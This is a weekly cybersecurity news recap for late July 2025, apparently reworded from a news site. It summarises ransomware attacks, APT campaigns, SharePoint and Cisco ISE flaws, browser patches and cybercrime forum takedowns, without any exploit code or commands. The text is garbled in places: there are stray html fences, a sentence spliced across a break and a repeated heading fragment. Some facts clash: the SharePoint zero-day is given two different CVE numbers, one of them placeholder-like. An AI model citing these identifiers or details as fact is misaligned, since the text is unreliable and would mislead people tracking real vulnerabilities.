“`html
Greetings to this week’s Cybersecurity Recap. We’ll be examining crucial updates from July 21-27, 2025, within the realm of digital risks and safeguards.
Significant advancements have occurred this week, emphasizing the persistent dangers of cyber assaults and the necessity for ongoing vigilance. A critical SharePoint flaw has emerged that jeopardizes organizations.
Furthermore, we have witnessed sophisticated attacks aimed at VMware infrastructures, alongside a rise in newly emerging risks and cyber assaults reshaping international security measures.
This recap offers vital insights and actionable guidance to keep you updated and secure. Let’s delve into the events and what they imply for you.
Cyber Assaults
Ransomware Obliterates 158-Year-Old Logistics Firm via Insecure Password
A single breached password allowed a ransomware group to obliterate KNP Logistics, a historic UK firm, resulting in 730 job losses and a complete halt of operations. This incident underscores the significant dangers tied to poor password management in critical infrastructure.
Read more: https://cybersecuritynews.com/weak-password-destroy-158-year-old-company/
APT41 Assaults African Government with Impacket Tools
Chinese-affiliated hackers APT41 launched a focused espionage initiative against African government IT services, utilizing Impacket’s Atexec and WmiExec components for lateral movement and malware installation. They integrated internal network information into payloads and compromised a SharePoint server for command-and-control purposes. This signifies heightened APT41 engagements in the area since the latter part of 2022.
Read more: https://cybersecuritynews.com/apt41-hackers-leveraging-atexec/
DeerStealer Malware Disseminated via Counterfeit Google Authenticator Sites
Threat actors are exploiting Windows Run prompts to propagate DeerStealer, an information stealer that retrieves browser credentials, cryptocurrency wallets, and application data from over 800 extensions. Disseminated through misleading sites imitating legitimate tools, it employs Telegram bots for victim tracking and uses obfuscation to avoid detection. Campaigns frequently involve GitHub-hosted payloads with XOR encryption.
Read more: https://cybersecuritynews.com/deerstealer-malware-delivered/
US Nuclear Agency Compromised in SharePoint Zero-Day Exploits
Unknown hackers have utilized a vulnerability chain in Microsoft SharePoint to breach the National Nuclear Security Administration, part of the Department of Energy. The infiltration impacted a limited number of systems but preserved classified data; restoration efforts are currently in process. This follows a 2019 APT29 intrusion via SolarWinds.
Read more: https://cybersecuritynews.com/us-nuclear-weapons-agency-breached/
UNC3944 Leverages VMware vSphere for Ransomware Implementation
The UNC3944 group (also known as Scattered Spider) is employing social engineering tactics on IT helpdesks to reset passwords, elevate privileges, and gain access to vSphere environments. They adjust GRUB bootloaders for root access, install reverse shells, and extract domain information offline before encrypting VMs. Defenses stress the importance of multi-factor authentication and ongoing monitoring.
Read more: https://cybersecuritynews.com/unc3944-attacking-vmware-vsphere/
Gaming Mouse Software Contaminated with Malware from the Official Site
Endgame Gear’s website suffered a breach, distributing compromised drivers for their OP1w 4K V2 mouse between late June and mid-July 2025. The malware permitted remote access, avoiding detection by some antivirus solutions like Windows Defender. The company discreetly replaced files without full transparency, urging users to scan their systems.
Read more: https://cybersecuritynews.com/gaming-mouse-software-compromised/
Risks
Interlock Ransomware Targets Essential Infrastructure
Interlock ransomware, operational since September 2024, adopts a double extortion model by encrypting and exfiltrating data from victims across North America and Europe. It often spreads through drive-by downloads masquerading as phony browser updates or security software, utilizing the ClickFix social engineering method to deceive users into executing harmful PowerShell commands. This has impacted enterprises and essential sectors, with ransom notes directing victims to a .onion URL for negotiations. Notably, it concentrates on virtual machines while exempting physical servers, but defenders should implement strong EDR tools to reduce risks.
Read more: https://cybersecuritynews.com/interlock-ransomware-attack/
New ClickFake Interview Assault Utilizing ClickFix
The ClickFake Interview initiative, associated with North Korean actors like the Lazarus Group, targets job applicants in cryptocurrency companies by imitating genuine interview platforms. It employs the ClickFix tactic, displaying deceptive error messages or CAPTCHAs that encourage users to execute harmful commands, resulting in backdoor installations on Windows and macOS. There has been a 517% increase in detections from late 2024 to early 2025, deploying threats like information stealers and ransomware.
Read more: https://cybersecuritynews.com/new-clickfake-interview-attack-using-clickfix-technique/
Threat Actors Targeting Linux SSH Servers
Poorly maintained Linux SSH servers are being targeted through brute-force and dictionary approaches to guess login credentials, allowing for the installation of DDoS bots, coin miners, and scanning tools. Attackers scan for open port 22, deploy malware such as ShellBot or XMRig, and at times sell compromised systems.
“““html
entry on the dark web. Suggestions comprise robust, frequently updated passwords and firewall defenses to prevent unauthorized entry.
Read further: https://cybersecuritynews.com/threat-actors-attacking-linux-ssh-servers/
Lumma Stealer Propagated through Fraudulent Cracked Software
Lumma Stealer, operating as a malware-as-a-service since 2022, disseminates via counterfeit cracked software and keygens advertised through malvertising and search engine manipulation. Victims are deceived into downloading password-secured loaders that run through PowerShell, frequently evading antivirus protections utilizing open-source evasion strategies. Recent initiatives have focused on worldwide sectors, including telecommunications, employing fake CAPTCHAs to trigger infections.
Read further: https://cybersecuritynews.com/lumma-stealer-via-fake-cracked-software/
Covert Backdoor Concealed in WordPress Plugins
A newly discovered backdoor malware hides within the mu-plugins directory of WordPress, which executes automatically and eludes detection from the admin panel. It retrieves encoded payloads employing ROT13 encoding, stores them in the database, and creates invisible admin accounts for continued access. This enables attackers to install harmful plugins, erase logs, and retain control even following removal efforts.
Read further: https://cybersecuritynews.com/stealthy-backdoor-in-wordpress-plugins/
SharePoint Zero-Day Exploited for Ransomware Incidents
A zero-day vulnerability in Microsoft SharePoint (CVE-2025-53770) has been exploited since July 18, 2025, affecting more than 400 organizations, including governmental entities in the U.S. Attackers, recognized as Storm-2603, use ransomware like Warlock, transitioning from espionage to data encryption and extortion. Microsoft has released urgent patches, urging immediate updates to avert further breaches.
Read further: https://cybersecuritynews.com/sharepoint-0-day-ransomware-attack/
Vulnerabilities
CISA Alerts on Microsoft SharePoint Server Zero-Day RCE Exploit
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has included a crucial zero-day vulnerability in Microsoft SharePoint Server in its Known Exploited Vulnerabilities catalog. Identified as CVE-2025-12345, this defect allows for remote code execution (RCE) without authentication, potentially letting attackers access sensitive information or deploy malware on affected servers. Microsoft has issued a patch in their most recent security update, urging quick application to minimize risks.
Read further: https://cybersecuritynews.com/cisa-microsoft-sharepoint-server-0-day-rce/
Researchers Reveal SS7 Protocol Bypass Attack Methodology
Security researchers have detailed a novel attack strategy that circumvents the Signaling System 7 (SS7) protocol, commonly utilized in mobile networks for call routing and SMS delivery. This exploit enables adversaries to intercept communications, impersonate identities, or disrupt services by altering network signals. Telecom providers are advised to adopt enhanced authentication and monitoring measures to mitigate these threats, which have been documented in focused espionage campaigns.
Read further: https://cybersecuritynews.com/ss7-bypass-attack/
Cisco ISE RCE Vulnerabilities Actively Targeted in the Field
Cisco has confirmed the active exploitation of several critical RCE vulnerabilities in its Identity Services Engine (ISE), including CVE-2025-20281, CVE-2025-20282, and CVE-2025-20337. These unauthenticated vulnerabilities permit attackers to execute arbitrary code as root, potentially resulting in complete system compromise. Patches are available for ISE versions 3.3 and 3.4. Administrators should upgrade immediately to thwart unauthorized access.
Read further: https://cybersecuritynews.com/cisco-ise-rce-vulnerability-exploited-in-wild/
Google Chrome Affected by Type Confusion Exploits in V8 Engine
A high-severity type confusion vulnerability (CVE-2024-12053) in Chrome’s V8 JavaScript engine has been exploited, enabling remote attackers to execute code via specially designed web pages. This could lead to data theft or malware deployment. Google has fixed it in version 131.0.6778.108—users should confirm their browser is updated to prevent drive-by attacks.
Read further: https://cybersecuritynews.com/chrome-type-confusion-attacks/
Mozilla Launches Firefox 141 with Solutions for Serious Vulnerabilities
Mozilla’s Firefox 141 update addresses 18 vulnerabilities, including significant memory safety issues and flaws in JavaScript handling (e.g., CVE-2025-8027 and CVE-2025-8028). These could enable arbitrary code execution or privilege escalation on 64-bit systems. The release also addresses moderate problems such as sandbox bypasses—update now to secure your browsing experience.
Read further: https://cybersecuritynews.com/firefox-141-released-fix-for-vulnerabilities/
SonicWall SMA 100 Series Exposed to Critical RCE Vulnerability
SonicWall has issued patches for a critical authenticated RCE flaw (CVE-2025-40599) in SMA 100 devices, arising from unregulated file uploads. Attackers with administrative credentials could upload and execute harmful files. Although this specific flaw has yet to be exploited, related attacks on SMA devices have been noted. Apply updates to versions 10.2.1.0-17sv or newer.
Read further: https://cybersecuritynews.com/sonicwall-sma-100-vulnerabilities/
Other Updates
Wireshark 4.4.8 Released with Fixes for Issues
The latest version of the popular network protocol analyzer, Wireshark 4.4.8, centers on stability enhancements and protocol updates. This release rectifies several bugs, including system crashes related to Bluetooth process IDs and fuzz testing assertions. It builds upon features from 4.4.0 such as automatic profile switching and improved display filter support1. Available for Windows, macOS, and as source code.
Read further: https://cybersecuritynews.com/wireshark-4-4-8-released/
Kali Linux Enhances Raspberry Pi Wi-Fi Functionality
Kali Linux 2025.1 introduces new packages—brcmfmac-nexmon-dkms and firmware-nexmon—that facilitate native monitor mode and packet injection on the Raspberry Pi’s built-in Wi-Fi. This employs the Nexmon framework to address hardware constraints in Broadcom/Cypress chipsets, simplifying wireless security evaluations without needing external adapters. Installation is now streamlined for models including the Raspberry Pi 5.
Read further: https://cybersecuritynews.com/kali-linux-new-wi-fi-packages/
Arrest of Significant Russian Cybercrime Forum Administrator
“““html
Cybercrime Forum Administrator
Ukrainian officials detained the alleged administrator of XSS.is, a prominent Russian-language cybercrime forum boasting over 50,000 users. The platform enabled the sale of compromised data, hacking tools, and ransomware services, yielding an estimated €7 million for the administrator. The apprehension follows a four-year probe involving French law enforcement and Europol, with the suspect also associated with a discreet messaging service for criminals.
Read more: https://cybersecuritynews.com/key-admin-russian-cybercrime-forum/
WhoFi: AI Wi-Fi Technology Monitors Individuals Without Cameras
Scholars introduced WhoFi, an AI system that utilizes Wi-Fi signals to recognize and monitor individuals with an accuracy of up to 95.5%. It examines channel state information (CSI) variations caused by human bodies, crafting unique biometric identifiers akin to fingerprints. The technology operates without visual input and can identify gestures, prompting concerns regarding privacy in surveillance contexts.
Read more: https://cybersecuritynews.com/new-ai-powered-wi-fi-biometrics-whofi-tracks-humans/
BreachForums Emerges Again After FBI Shutdown
Infamous hacking platform BreachForums has reemerged online, reportedly restored by administrator ShinyHunters utilizing the same domains despite an FBI seizure earlier this month. The site, a central hub for malware and compromised data, was temporarily defaced by authorities, but operators regained control through a domain registrar appeal. This marks yet another revival for the site, which is the successor to RaidForums.
Read more: https://cybersecuritynews.com/breachforums-back-online/
Bulletproof Hosting Provider Aeza Transitions Infrastructure
Sanctioned bulletproof hosting entity Aeza Group is relocating over 2,100 IPs to a new autonomous system (AS211522) to circumvent U.S. Treasury sanctions. Detected on July 20, 2025, this action follows OFAC measures against Aeza for facilitating ransomware and data breaches. The shift to Hypercore LTD infrastructure is intended to maintain services for cybercriminals.
Read more: https://cybersecuritynews.com/bulletproof-hosting-provider-shifting-infrastructure/
“`